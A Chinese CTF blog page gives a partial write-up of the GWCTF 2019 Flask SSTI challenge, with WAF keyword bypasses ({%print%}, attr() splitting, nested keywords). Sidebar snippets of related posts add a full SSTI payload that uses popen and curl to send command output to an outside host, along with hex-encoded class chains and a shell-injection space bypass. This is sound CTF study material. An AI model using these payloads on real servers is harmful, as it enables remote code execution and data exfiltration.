[GWCTF 2019]你的名字 - SSTI注入(waf绕过)

最新推荐文章于 2024-10-18 19:15:00 发布
最新推荐文章于 2024-10-18 19:15:00 发布
阅读量354 收藏
点赞数
文章标签: web安全 安全 ctf SSTI flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ozuoshen123/article/details/133737289
版权
博客分析了一道GWCTF 2019中的SSTI(Server-Side Template Injection)注入问题。作者详细介绍了解题流程,包括页面输入分析、过滤关键字的识别以及如何通过{%print%}、关键字形式绕过WAF过滤。在解题过程中,重点讲述了如何利用两层过滤机制构造payload,最终发现flag存在于env中。博客总结了从class到env变量获取过程中的关键点和Python 2.7.18版本的特殊性。
摘要由CSDN通过智能技术生成

[GWCTF 2019]你的名字

在这里插入图片描述

1 解题流程

1.1 分析

1、页面只有一个输入框,输入什么回显什么
2、根据特性应该是SSTI注入

1.2 解题

  1. fuzz:过滤则长度1512
    过滤:{ {}}、class、mro、builtins、file、func_globals、import、args、eval、for、if、config、popen(将open过滤)
    绕过:{ {}}用{%print%}、关键字要么用attr(‘cla’'ss’)|attr(‘base’)形式绕过、要么用['__clas'+'s__']形式绕过、要么用clconfigass形式绕过
    这里简单讲一下为什么最后的形式是claconfigss,因为waf是将关键字置空,但是这道题大概率的两层过滤,第一层先过滤class,第二层再过滤config,所以导致claconfigss绕过第一层后,第二层将config置空变成cla
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
专栏目录
订阅专栏
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1665
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
[GWCTF 2019]你的名字
qq_43801002的博客
07-28 1388
题目 过程 1.在 ssti 中过滤了后, 可以通过{%外带 {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %} 由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。 只要在其他语句加入他,那么就可以绕过其他语句了。 但是不知道他得blackl
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3448
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009626的博客
04-20 807
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3741
web安全-SSTI模板注入漏洞
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2522
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
buu刷题(4)
qq_62046696的博客
03-22 576
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3357
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
buu Crypto学习记录(7) password
EMsheep的博客
11-27 542
题目链接:https://buuoj.cn/challenges#password 姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} flag:zs19900315
re学习笔记(39)BUUCTF-re-[GWCTF 2019]xxor
逆向随笔
02-20 1719
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目链接:[GWCTF 2019]xxor xorm[0] = 3746099070, xorm[1] = 550153460, xorm[2] = 3774025685, xorm[3] = 1548802262, xorm[4] = 2652626477, xorm[5] = 2230518816 ...
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 518
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-18 522
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
最新发布
2401_85027336的博客
10-18 681
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】1,600$:Auth0 错误配置
等风来
10-13 328
Auth0 是一个广泛用于网站和应用程序的身份验证平台,负责管理用户身份并确保其服务的安全访问。该平台提供了多种工作流程,以无缝集成登录和注册流程。
网络安全公司及其主要产品介绍
xixixi7777的博客
10-13 493
各大安全公司提供的网络安全产品针对不同的企业需求和网络架构,涵盖从端点安全、网络安全到云安全的全方位解决方案。在选择网络安全产品时,企业应结合自身的网络规模、威胁类型和业务需求,选择适合的产品组合,以建立健全的网络安全体系。Huawei Cyber Security Intelligence System(CIS):基于大数据的安全智能平台,支持安全威胁的早期检测和响应。FireEye Helix:集成SIEM和安全运营中心功能的安全管理平台,提供集中化的威胁管理和自动化响应。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1415
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。
网络安全(黑客)——自学2024
2401_85026883的博客
10-14 1543
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值